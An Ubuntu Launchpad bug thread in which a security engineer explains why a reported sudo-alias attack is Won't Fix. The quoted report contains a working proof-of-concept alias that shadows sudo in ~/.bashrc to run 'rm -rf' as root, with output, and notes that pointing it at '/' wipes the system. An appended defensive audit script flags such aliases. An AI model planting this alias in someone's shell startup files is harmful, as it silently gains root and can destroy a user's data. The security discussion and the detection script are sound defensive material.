[Bug 1893241] Re: attack alias sudo with nasty payload
Seth Arnold
1893241 at bugs.launchpad.net
Fri Aug 28 22:29:27 UTC 2020
Hello Patrik, thanks for your concern for Ubuntu's security.
As you said, there are numerous possibilities for trouble when an
account is compromised in this fashion. Placing malicious versions of
utilities into ~/bin is another common choice. (Usually shell aliases,
functions, and ~/bin/ replacements of common utilities is in the realm
of "students playing practical jokes on each other when they first use
Unix systems".)
Consider a slight modification of your function, to call it 'ls' or 'mv'
or 'cat'. Would it be any less dangerous? If the user used sudo in that
terminal recently, it's bad news. If the user didn't authenticate to
sudo recently they will be prompted for a password, they may wonder why,
and start to investigate. How? With 'vi'? With 'cat'? With 'alias'? Each
of those could also do other malicious things.
A more enterprising attacker with the ability to modify user files could
install a keylogger, or cause shell sessions to start with script(1) or
similar utilities, or use ptrace-based debugging techniques to read
secrets from user processes, etc. These would be more reliable and
harder to spot.
On Ubuntu, it is a convention that the first user account on the
computer gets sudo access; while this is very convenient, it's also a
risk. It is also common for higher-security environments for one person
to have multiple accounts: one used for administrative actions and one
used for their personal work on the computer.
It is also important to recall that root access is not necessarily the
most important goal of an attacker. Computers work with a wide variety
of data from a wide variety of sources, and threats like cryptolockers or
data exfiltration often don't need root privileges to be
catastrophically bad for a user or an organization.
There's no simple solution to address what you've found. It used to be
common for system administrators to run periodic checks of all user
files to make sure permissions made sense, there was nothing malicious
in them, etc. (This was my introduction to Unix security in the 90s; an
ircii plugin I had downloaded added '+ +' to my ~/.rhosts file. It was
spotted by the sysadmin a few hours later thanks to an automated tool.)
In addition to checking for too-wide write permissions, also be sure to
protect your account with good, high-quality, passwords, and disable
password authentication where you can, so you can rely upon ssh
authorized_keys instead. Lock your screen before suspending your laptop
or walking away from your desktop. Be careful with what USB and Firewire
devices you plug into your computer. And so on.
We can't realistically try to handle "someone has write access to my
home directory" as a threat model. If someone has write access to your
home directory they can do a great deal of damage.
Thanks
https://bugs.launchpad.net/bugs/1893241
Title:
attack alias sudo with nasty payload
Status in bash package in Ubuntu:
Won't Fix
Bug description:
Put the alias below in ~/.bashrc, which is writable by the current
user and wait for the user to open up a shell and become root.
There are numerous possibilities. If you exchange
"/tmp/aBSoLuTLYNoTHiNG" for "/" it becomes dangerous. Or imagine an
attacker that can't become root in any other way and wants to set up
a botnet.
$ alias sudo='function f() { sudo -- rm -rf "/tmp/aBSoLuTLYNoTHiNG" ; sudo touch "/tmp/aBSoLuTLYNoTHiNG" ; echo "Everything removed!!" ; sudo "$@" ; } ; f "$@"'
$ stat /tmp/aBSoLuTLYNoTHiNG
stat: cannot stat '/tmp/aBSoLuTLYNoTHiNG': No such file or directory
$ sudo echo 'hello wonderful world!'
Everything removed!!
hello wonderful world!
$ stat /tmp/aBSoLuTLYNoTHiNG
File: /tmp/aBSoLuTLYNoTHiNG
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: fd00h/64768d Inode: 4718664 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2020-08-27 18:09:50.960080579 +0200
Modify: 2020-08-27 18:09:50.960080579 +0200
Change: 2020-08-27 18:09:50.960080579 +0200
Birth: -
File written by root! Fastest fix: Sudo is not allowed to be an alias.
Extra information:
$ lsb_release -rd
Description: Ubuntu 20.04.1 LTS
Release: 20.04
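An added defender-side check, not code from the bug report or from Ubuntu: a POSIX sh audit that flags alias or function definitions shadowing privileged commands in a shell startup file (the pattern used in the report above) and flags startup files that group or other accounts could edit, which is the kind of permission check Seth describes. The function names, the PRIV_CMDS list and the two sample startup files are this example's own constructions.

```shell
#!/bin/sh
# Audit a shell startup file (this example's own code, not from the bug
# report): flag alias/function definitions that shadow privileged commands,
# and flag files that someone other than the owner could write to.

PRIV_CMDS="sudo su ssh"   # commands worth protecting from shadowing; adjust

# find_shadowing FILE: print each line of FILE that redefines one of
# PRIV_CMDS as an alias or shell function. Returns 0 if any was found.
find_shadowing() {
    _file=$1; _found=1
    for _cmd in $PRIV_CMDS; do
        # matches:  alias sudo=...   sudo() {...   function sudo {...
        if grep -nE "^[[:space:]]*(alias[[:space:]]+$_cmd=|$_cmd[[:space:]]*\(\)|function[[:space:]]+$_cmd([^[:alnum:]_]|$))" "$_file"; then
            _found=0
        fi
    done
    return $_found
}

# other_writable FILE: returns 0 if FILE is group- or world-writable,
# i.e. another account could plant an alias like the one in the report.
other_writable() {
    _mode=$(ls -ld "$1" | cut -c1-10)      # e.g. -rw-rw-r--
    case "$_mode" in
        ?????w????|????????w?) return 0 ;;  # group 'w' or other 'w' set
    esac
    return 1
}

# Constructed sample startup files (not real user data); the alias in
# BAD_RC is only text in a file and is never executed by this script.
BAD_RC=$(mktemp); CLEAN_RC=$(mktemp)
cat >"$BAD_RC" <<'EOF'
export EDITOR=vi
alias ll='ls -alF'
alias sudo='f() { echo "shadowed"; sudo "$@"; }; f "$@"'
EOF
printf 'export EDITOR=vi\nalias ll=%s\n' "'ls -alF'" >"$CLEAN_RC"
chmod 664 "$BAD_RC"; chmod 600 "$CLEAN_RC"

# audit_file FILE: run both checks; returns 0 only when the file is clean.
audit_file() {
    _rc=0
    find_shadowing "$1" && { echo "$1: shadows a privileged command"; _rc=1; }
    other_writable "$1" && { echo "$1: writable by group or others"; _rc=1; }
    return $_rc
}
```

Run `audit_file ~/.bashrc ~/.bash_aliases ~/.profile` style loops over each startup file a login shell reads; a non-zero exit means something needs a look.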